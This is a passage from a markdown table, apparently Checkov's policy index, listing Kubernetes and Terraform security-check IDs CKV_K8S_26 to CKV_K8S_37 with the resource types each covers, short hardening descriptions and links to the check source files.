Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2692 | CKV_K8S_26 | resource | DaemonSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2693 | CKV_K8S_26 | resource | Deployment | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2694 | CKV_K8S_26 | resource | DeploymentConfig | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2695 | CKV_K8S_26 | resource | Job | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2696 | CKV_K8S_26 | resource | Pod | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2697 | CKV_K8S_26 | resource | PodTemplate | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2698 | CKV_K8S_26 | resource | ReplicaSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2699 | CKV_K8S_26 | resource | ReplicationController | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2700 | 
CKV_K8S_26 | resource | StatefulSet | Do not specify hostPort unless absolutely necessary | Kubernetes | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/HostPort.py) | -| 2701 | CKV_K8S_26 | resource | kubernetes_deployment | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2702 | CKV_K8S_26 | resource | kubernetes_deployment_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2703 | CKV_K8S_26 | resource | kubernetes_pod | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2704 | CKV_K8S_26 | resource | kubernetes_pod_v1 | Do not specify hostPort unless absolutely necessary | Terraform | [HostPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/HostPort.py) | -| 2705 | CKV_K8S_27 | resource | CronJob | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2706 | CKV_K8S_27 | resource | DaemonSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2707 | CKV_K8S_27 | resource | Deployment | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2708 | CKV_K8S_27 | resource | Job 
| Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2709 | CKV_K8S_27 | resource | Pod | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2710 | CKV_K8S_27 | resource | ReplicaSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2711 | CKV_K8S_27 | resource | ReplicationController | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2712 | CKV_K8S_27 | resource | StatefulSet | Do not expose the docker daemon socket to containers | Kubernetes | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DockerSocketVolume.py) | -| 2713 | CKV_K8S_27 | resource | kubernetes_daemon_set_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2714 | CKV_K8S_27 | resource | kubernetes_daemonset | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2715 | CKV_K8S_27 | resource | kubernetes_deployment | Do not expose the docker daemon socket to containers | Terraform | 
[DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2716 | CKV_K8S_27 | resource | kubernetes_deployment_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2717 | CKV_K8S_27 | resource | kubernetes_pod | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2718 | CKV_K8S_27 | resource | kubernetes_pod_v1 | Do not expose the docker daemon socket to containers | Terraform | [DockerSocketVolume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DockerSocketVolume.py) | -| 2719 | CKV_K8S_28 | resource | CronJob | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2720 | CKV_K8S_28 | resource | DaemonSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2721 | CKV_K8S_28 | resource | Deployment | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2722 | CKV_K8S_28 | resource | DeploymentConfig | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2723 | 
CKV_K8S_28 | resource | Job | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2724 | CKV_K8S_28 | resource | Pod | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2725 | CKV_K8S_28 | resource | PodTemplate | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2726 | CKV_K8S_28 | resource | ReplicaSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2727 | CKV_K8S_28 | resource | ReplicationController | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2728 | CKV_K8S_28 | resource | StatefulSet | Minimize the admission of containers with the NET_RAW capability | Kubernetes | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DropCapabilities.py) | -| 2729 | CKV_K8S_28 | resource | kubernetes_deployment | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2730 | CKV_K8S_28 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | 
[DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2731 | CKV_K8S_28 | resource | kubernetes_pod | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2732 | CKV_K8S_28 | resource | kubernetes_pod_v1 | Minimize the admission of containers with the NET_RAW capability | Terraform | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | -| 2733 | CKV_K8S_29 | resource | CronJob | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2734 | CKV_K8S_29 | resource | DaemonSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2735 | CKV_K8S_29 | resource | Deployment | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2736 | CKV_K8S_29 | resource | Job | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2737 | CKV_K8S_29 | resource | Pod | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2738 | CKV_K8S_29 | resource | ReplicaSet | Apply security context to your 
pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2739 | CKV_K8S_29 | resource | ReplicationController | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2740 | CKV_K8S_29 | resource | StatefulSet | Apply security context to your pods and containers | Kubernetes | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py) | -| 2741 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2742 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2743 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2744 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2745 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | 
[PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2746 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | -| 2747 | CKV_K8S_30 | resource | CronJob | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2748 | CKV_K8S_30 | resource | DaemonSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2749 | CKV_K8S_30 | resource | Deployment | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2750 | CKV_K8S_30 | resource | DeploymentConfig | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2751 | CKV_K8S_30 | resource | Job | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2752 | CKV_K8S_30 | resource | Pod | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2753 | CKV_K8S_30 | resource | PodTemplate | Apply security 
context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2754 | CKV_K8S_30 | resource | ReplicaSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2755 | CKV_K8S_30 | resource | ReplicationController | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2756 | CKV_K8S_30 | resource | StatefulSet | Apply security context to your containers | Kubernetes | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py) | -| 2757 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2758 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2759 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2760 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | 
[ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | -| 2761 | CKV_K8S_31 | resource | CronJob | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2762 | CKV_K8S_31 | resource | DaemonSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2763 | CKV_K8S_31 | resource | Deployment | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2764 | CKV_K8S_31 | resource | Job | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2765 | CKV_K8S_31 | resource | Pod | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2766 | CKV_K8S_31 | resource | ReplicaSet | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2767 | CKV_K8S_31 | resource | ReplicationController | Ensure that the seccomp profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2768 | CKV_K8S_31 | resource | StatefulSet | Ensure that the seccomp 
profile is set to docker/default or runtime/default | Kubernetes | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py) | -| 2769 | CKV_K8S_32 | resource | PodSecurityPolicy | Ensure default seccomp profile set to docker/default or runtime/default | Kubernetes | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py) | -| 2770 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | -| 2771 | CKV_K8S_33 | resource | CronJob | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2772 | CKV_K8S_33 | resource | DaemonSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2773 | CKV_K8S_33 | resource | Deployment | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2774 | CKV_K8S_33 | resource | DeploymentConfig | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2775 | CKV_K8S_33 | resource | Job | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2776 | CKV_K8S_33 | 
resource | Pod | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2777 | CKV_K8S_33 | resource | PodTemplate | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2778 | CKV_K8S_33 | resource | ReplicaSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2779 | CKV_K8S_33 | resource | ReplicationController | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2780 | CKV_K8S_33 | resource | StatefulSet | Ensure the Kubernetes dashboard is not deployed | Kubernetes | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py) | -| 2781 | CKV_K8S_34 | resource | CronJob | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2782 | CKV_K8S_34 | resource | DaemonSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2783 | CKV_K8S_34 | resource | Deployment | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2784 | CKV_K8S_34 | resource | DeploymentConfig | Ensure that Tiller (Helm v2) is not deployed | 
Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2785 | CKV_K8S_34 | resource | Job | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2786 | CKV_K8S_34 | resource | Pod | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2787 | CKV_K8S_34 | resource | PodTemplate | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2788 | CKV_K8S_34 | resource | ReplicaSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2789 | CKV_K8S_34 | resource | ReplicationController | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2790 | CKV_K8S_34 | resource | StatefulSet | Ensure that Tiller (Helm v2) is not deployed | Kubernetes | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py) | -| 2791 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2792 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2793 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller 
(Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2794 | CKV_K8S_34 | resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | -| 2795 | CKV_K8S_35 | resource | CronJob | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2796 | CKV_K8S_35 | resource | DaemonSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2797 | CKV_K8S_35 | resource | Deployment | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2798 | CKV_K8S_35 | resource | DeploymentConfig | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2799 | CKV_K8S_35 | resource | Job | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2800 | CKV_K8S_35 | resource | Pod | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2801 | CKV_K8S_35 | resource | PodTemplate | Prefer using secrets as files over secrets as environment variables | Kubernetes | 
[Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2802 | CKV_K8S_35 | resource | ReplicaSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2803 | CKV_K8S_35 | resource | ReplicationController | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2804 | CKV_K8S_35 | resource | StatefulSet | Prefer using secrets as files over secrets as environment variables | Kubernetes | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py) | -| 2805 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2806 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2807 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2808 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | -| 2809 | CKV_K8S_36 | resource | PodSecurityPolicy | Minimize the admission of containers 
with capabilities assigned | Kubernetes | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py) | -| 2810 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | -| 2811 | CKV_K8S_37 | resource | CronJob | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2812 | CKV_K8S_37 | resource | DaemonSet | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2813 | CKV_K8S_37 | resource | Deployment | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2814 | CKV_K8S_37 | resource | DeploymentConfig | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2815 | CKV_K8S_37 | resource | Job | Minimize the admission of containers with capabilities assigned | Kubernetes | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py) | -| 2816 | CKV_K8S_37 | resource | Pod | Minimize the admission of containers with capabilities assigned | Kubernetes | 
